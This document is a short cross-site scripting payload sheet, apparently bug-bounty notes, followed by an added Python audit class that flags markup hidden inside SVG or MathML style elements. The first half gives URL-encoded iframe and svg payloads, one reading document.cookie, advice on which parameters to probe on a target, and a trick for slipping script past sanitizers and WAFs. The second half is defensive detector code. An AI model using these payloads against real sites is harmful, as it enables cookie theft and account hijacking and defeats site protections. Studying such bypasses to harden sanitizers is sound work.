%22%26%23x27%3B%3E%3CiFrAme%2Fsrc%3DjaVascRipt%3Aprompt.valueOf%28%29%281%29%3E%3C%2FiFramE%3E
%3CsVg%2Fonload%3Dprompt%28document.cookie%29%3E
Don't forget to check the note and tracking_info parameters if you see them in your target :)
start_sequence = "<script>\nonload=alert(\"xss\");</script>"
Try to hide your XSS payload inside the style tag of the SVG or Math element to
bypass the XSS sanitizer or WAF filter.
<svg><style> <script>alert(1)</script> </style></svg>
<math><style> <img src onerror=alert(2)> </style></math>
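
Why the tip above gets past some filters, shown from the filter's side in an added example that is not part of the original page: a parser that always treats `<style>` content as raw text (Python's `html.parser` does) never sees the nested tags, while a browser inside `<svg>` or `<math>` parses them as markup. The `ForeignStyleAudit` class and `audit` function are hypothetical names, and the inputs are the two strings from the tip plus constructed controls.

```python
import re
from html.parser import HTMLParser

FOREIGN_ROOTS = {"svg", "math"}               # elements that start foreign content
MARKUP_IN_TEXT = re.compile(r"<[A-Za-z!/?]")  # text a browser could tokenize as a tag


class ForeignStyleAudit(HTMLParser):
    """Hypothetical helper: flag <style> bodies under <svg>/<math> that hold markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.stack = []      # open element names, innermost last (lowercased by the parser)
        self.findings = []   # (foreign_root, raw_style_text)
        self._buf = None     # chunks of the <style> body being read, or None

    def handle_starttag(self, tag, attrs):
        self.stack.append(tag)
        if tag == "style" and FOREIGN_ROOTS & set(self.stack):
            self._buf = []

    def handle_data(self, data):
        # html.parser delivers everything up to </style> here as plain text.
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "style" and self._buf is not None:
            text = "".join(self._buf)
            self._buf = None
            if MARKUP_IN_TEXT.search(text):
                root = next(t for t in self.stack if t in FOREIGN_ROOTS)
                self.findings.append((root, text.strip()))
        if tag in self.stack:
            while self.stack.pop() != tag:   # pop back to the matching open element
                pass


def audit(html):
    """Return findings; an empty list means no markup hidden in foreign <style>."""
    parser = ForeignStyleAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for sample in ("<svg><style> <script>alert(1)</script> </style></svg>",
                   "<svg><style>.a{fill:red}</style></svg>"):  # second is a constructed control
        print(sample, "->", audit(sample))
```

A sanitizer should reject or re-serialize any input with findings rather than pass the `<style>` body through as inert text.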